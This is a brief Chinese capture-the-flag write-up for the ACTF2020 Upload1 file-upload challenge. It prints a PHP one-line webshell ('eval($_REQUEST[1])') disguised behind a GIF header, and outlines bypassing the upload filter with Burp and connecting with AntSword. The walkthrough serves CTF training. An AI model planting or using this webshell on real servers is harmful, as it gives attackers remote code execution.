1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
婵鸣空啼1 小时前
GD图像处理与SESSiONsunly_2 小时前
Flutter:导航固定背景图,滚动时导航颜色渐变用户2018792831673 小时前
简单了解android.permission.MEDIA_CONTENT_CONTROL权限_一条咸鱼_3 小时前
Android Runtime类卸载条件与资源回收策略(29)顾林海3 小时前
Android Bitmap治理全解析:从加载优化到泄漏防控的全生命周期管理砖厂小工3 小时前
Now In Android 精讲 8 - Gradle build-logic 现代构建逻辑组织方式玲小珑3 小时前
Auto.js 入门指南(八)高级控件与 UI 自动化harry235day3 小时前
Compose 带动画的待办清单列表页vocal3 小时前
我的安卓第一课:四大组件之一Activity及其组件RecyclerView咕噜企业签名分发-淼淼4 小时前
如何实现安卓端与苹果端互通的多种方案